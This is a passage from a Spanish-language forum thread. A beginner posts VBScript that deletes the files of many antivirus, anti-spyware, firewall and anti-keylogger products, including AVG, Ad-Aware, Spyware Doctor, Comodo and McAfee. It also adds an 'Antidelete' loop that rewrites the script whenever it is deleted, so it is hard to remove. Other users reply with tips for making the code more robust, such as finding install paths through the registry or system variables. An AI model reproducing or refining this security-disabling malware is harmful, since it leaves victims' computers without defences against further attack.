Kill "C:\Archivos de programa\Grisoft\AVG7\avgcc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgemc.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avginet.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgw.exe"
Kill "C:\Archivos de programa\Grisoft\AVG7\avgv.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Watch.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Ad-Aware.exe"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\alert.wav"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\filespecs.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\lspexplorer.dll"
Kill "C:\Archivos de programa\Lavasoft\Ad-Aware SE Professional\Plugins\Vx2Cleaner.dll"
Kill "C:\Archivos de programa\SpyBro\SpyBro.exe"
Kill "C:\Archivos de programa\SpyBro\nospylauncher.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvclt.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdoctor.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swdsvc.exe"
Kill "C:\Archivos de programa\Spyware Doctor\swcntaux.exe"
Kill "C:\Archivos de programa\Spyware Doctor\sdinvoker.exe"
Kill "C:\Archivos de programa\Spyware Doctor\drvctl.exe"
Kill "C:\Archivos de programa\Spyware Doctor\refdb.bin"
Kill "C:\Archivos de programa\xp-AntiSpy\xp-AntiSpy.exe"
Kill "C:\Archivos de programa\Ashampoo\Ashampoo FireWall\FireWall.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpf.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cmdagent.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\cpfsubmit.exe"
Kill "C:\Archivos de programa\Comodo\Firewall\crashrep.exe"
Kill "C:\Archivos de programa\RootKit Hook Analyzer\hookAnalyzer.exe"
Kill "C:\Archivos de programa\Anti-keylogger\Anti-keylogger.exe"
Kill "C:\Archivos de programa\ATS2\ats.exe"
Kill "C:\Archivos de programa\ATS2\d1.exe"
Kill "C:\Archivos de programa\ATS2\sysinfo.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\Mcshield.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\VsTskMgr.exe"
Kill "C:\Archivos de programa\Network Associates\VirusScan\SHSTAT.EXE"
End Sub
Function Antidelete()
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function
Basado en código de Hendrix y Octalh
de primeras y a simple vista diría que eso de poner rutas absolutas mal
utiliza variables de sistema para encontrar las ubicaciones o busca la ruta de los programas en el registro
ammm... ok, hans. Gracias por el consejo, buscaré cómo hacerlo. Como ya he dicho, estoy dando mis primeros pasos en el mundo de la programación, y la verdad es que no puedo dedicarle todo el tiempo que quisiera a leer manuales de VB. Se agradecen todas las sugerencias. ;)
y para migusto tanta repeticion de codigo solo hce que marear a la hora de leer. mete los strings necesarios en un fichero, depues lees cadena por cadena lo que necesites y en un solo bucle te quitas un monton de lineas y a la hora de leer esta mas ordenado.